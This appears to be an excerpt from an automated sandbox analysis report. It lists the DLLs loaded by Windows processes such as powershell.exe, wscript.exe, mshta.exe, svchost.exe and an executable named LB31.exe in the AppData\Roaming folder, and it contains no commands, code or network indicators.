              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\LB31.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\LB31.exeSection loaded: winmm.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
